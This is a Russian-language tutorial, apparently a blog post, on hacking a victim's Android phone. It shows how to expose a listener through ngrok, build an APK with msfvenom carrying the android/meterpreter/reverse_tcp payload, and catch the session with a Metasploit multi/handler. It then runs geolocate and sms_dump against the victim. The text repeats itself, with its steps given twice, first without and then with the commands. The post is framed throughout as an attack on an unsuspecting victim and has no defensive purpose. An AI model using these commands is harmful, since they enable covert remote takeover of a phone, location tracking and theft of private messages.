Речь пойдёт от ngrok и metasploit, и как можно взломать телефон и захватить управление
Сначала зайдите на сайт и создайте там аккаунт. После этого скачиваем сам нгрок.
Затем выкидываем его на рабочий стол и пишем:
И пишем
Кстати, если у вас белый IP адрес, то Ngrok'ом можно не пользоваться.
Теперь нам надо уже пойти к создания нашего пейлоада для телефона.
Для этого нам поможет msfvenom, для этого мы в новой консоле пишем:
Вот сам пейлоад готов, теперь мы должны кинуть его жертве.
Теперь нам надо узнать ип, если вы на кали то командой "ipconfig", а если как и я на арч то "ip a".
Ну а дальше в бой пойдет сам метасплоит, он предустановлен в kali linux).
Чтобы его запустить надо просто написать в консоле msfconsole.
И уже там пишем:
Теперь у нас есть доступ к телефону жертвы.
Давайте узнаем текущую геолокацию: geolocate
Также можно сделать дамп всех смс, командой:
Данными действиями мы произвели подключение к телефону, и у нас есть полный набор возможностей дальнейших действий с ним.
Сначала зайдите на сайт и создайте там аккаунт. После этого скачиваем сам нгрок.
Затем выкидываем его на рабочий стол и пишем:
ngrok-stable-linux-amd64.zip
И пишем
Прописываем в терминале./ngrok authtoken <TOKEN>
./ngrok tcp 4444
Кстати, если у вас белый IP адрес, то Ngrok'ом можно не пользоваться.
Теперь нам надо уже пойти к создания нашего пейлоада для телефона.
Для этого нам поможет msfvenom, для этого мы в новой консоле пишем:
Если ты не используешь Ngrok, то в поле LHOST вписываешь свой ip адрес, а в поле LPORT ставишь 4444msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=10612 R > payload.apk
Вот сам пейлоад готов, теперь мы должны кинуть его жертве.
Теперь нам надо узнать ип, если вы на кали то командой "ipconfig", а если как и я на арч то "ip a".
Ну а дальше в бой пойдет сам метасплоит, он предустановлен в kali linux).
Чтобы его запустить надо просто написать в консоле msfconsole.
И уже там пишем:
После чего жертва запустит наш пайлоад, и у нас откроется сессия.msfconsole
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
Теперь у нас есть доступ к телефону жертвы.
Давайте узнаем текущую геолокацию: geolocate
Также можно сделать дамп всех смс, командой:
sms_dump
Данными действиями мы произвели подключение к телефону, и у нас есть полный набор возможностей дальнейших действий с ним.